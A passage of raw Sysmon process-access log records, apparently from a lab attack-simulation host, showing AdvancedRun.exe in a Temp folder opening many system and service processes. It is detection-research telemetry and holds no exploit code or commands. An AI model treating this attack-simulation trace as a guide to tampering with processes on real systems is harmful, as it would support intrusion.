Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004063665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.917{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.917{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.916{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 